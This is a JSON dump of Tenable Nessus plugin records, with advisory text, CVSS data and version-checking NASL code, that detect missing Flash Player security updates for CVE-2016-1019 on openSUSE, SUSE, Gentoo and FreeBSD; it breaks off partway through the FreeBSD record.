"2016-04-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-2016-440)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2016-440.NASL", "href": "https://www.tenable.com/plugins/nessus/90479", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-440.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90479);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2016-1019\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2016-440)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2016-1019: Adobe Flash Player earlier allowed remote\n attackers to cause a denial of service (application\n crash) or possibly execute arbitrary code via\n unspecified vectors, as exploited in the wild in April\n 2016 Aliased: (bsc#974209).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=974209\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-player packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.616-159.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.616-159.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.616-159.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-13T14:31:12", "description": "flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2016-1019: Adobe Flash Player earlier allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors, as exploited in the wild in April 2016 Aliased: (bsc#974209).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-2016-433)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-433.NASL", "href": "https://www.tenable.com/plugins/nessus/90476", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-433.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90476);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2016-1019\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-2016-433)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2016-1019: Adobe Flash Player earlier allowed remote\n attackers to cause a denial of service (application\n crash) or possibly execute arbitrary code via\n unspecified vectors, as exploited in the wild in April\n 2016 Aliased: (bsc#974209).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=974209\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-player packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.616-2.94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.616-2.94.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.616-2.94.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T16:06:55", "description": "flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2016-1019: Adobe Flash Player allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors, as exploited in the wild in April 2016 (bsc#974209).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-13T00:00:00", "type": "nessus", "title": "SUSE SLED12 Security Update : flash-player (SUSE-SU-2016:0990-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:flash-player", "p-cpe:/a:novell:suse_linux:flash-player-gnome", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-0990-1.NASL", "href": "https://www.tenable.com/plugins/nessus/90505", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0990-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90505);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2016-1019\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"SUSE SLED12 Security Update : flash-player (SUSE-SU-2016:0990-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"flash-player was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2016-1019: Adobe Flash Player allowed remote\n attackers to cause a denial of service (application\n crash) or possibly execute arbitrary code via\n unspecified vectors, as exploited in the wild in April\n 2016 (bsc#974209).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=974209\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1019/\");\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160990-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5c9214d2\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-582=1\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-582=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-582=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-582=1\n\nTo bring your system up-to-date, use 'zypper patch'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.616-126.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.616-126.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.616-126.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.616-126.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:26:15", "description": "The remote host is affected by the vulnerability described in GLSA-201606-08 (Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-20T00:00:00", "type": "nessus", "title": "GLSA-201606-08 : Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1019", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163", "CVE-2016-4171"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:adobe-flash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201606-08.NASL", "href": "https://www.tenable.com/plugins/nessus/91702", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201606-08.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91702);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\n \"CVE-2016-1019\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\",\n \"CVE-2016-4171\"\n );\n script_xref(name:\"GLSA\", value:\"201606-08\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"GLSA-201606-08 : Adobe Flash Player: Multiple vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-201606-08\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/201606-08\");\n script_set_attribute(attribute:\"solution\", value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose 'www-plugins/adobe-flash-11.2.202.626'\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.626\"), vulnerable:make_list(\"lt 11.2.202.626\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-13T14:32:55", "description": "Adobe reports :\n\nThese updates harden a mitigation against JIT spraying attacks that could be used to bypass memory layout randomization mitigations (CVE-2016-1006).\n\nThese updates resolve type confusion vulnerabilities that could lead to code execution (CVE-2016-1015, CVE-2016-1019).\n\nThese updates resolve use-after-free vulnerabilities that could lead to code execution (CVE-2016-1011, CVE-2016-1013, CVE-2016-1016, CVE-2016-1017, CVE-2016-1031).\n\nThese updates resolve memory corruption vulnerabilities that could lead to code execution (CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, CVE-2016-1033).\n\nThese updates resolve a stack overflow vulnerability that could lead to code execution (CVE-2016-1018).\n\nThese updates resolve a security bypass vulnerability (CVE-2016-1030).\n\nThese updates resolve a vulnerability in the directory search path used to find resources that could lead to code execution (CVE-2016-1014).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-20T00:00:00", "type": "nessus", "title": "FreeBSD : flash -- multiple vulnerabilities (07888b49-35c4-11e6-8e82-002590263bf5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6_64-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_07888B4935C411E68E82002590263BF5.NASL", "href": "https://www.tenable.com/plugins/nessus/91696", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91696);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"FreeBSD : flash -- multiple vulnerabilities (07888b49-35c4-11e6-8e82-002590263bf5)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Adobe reports :\n\nThese updates harden a mitigation against JIT spraying 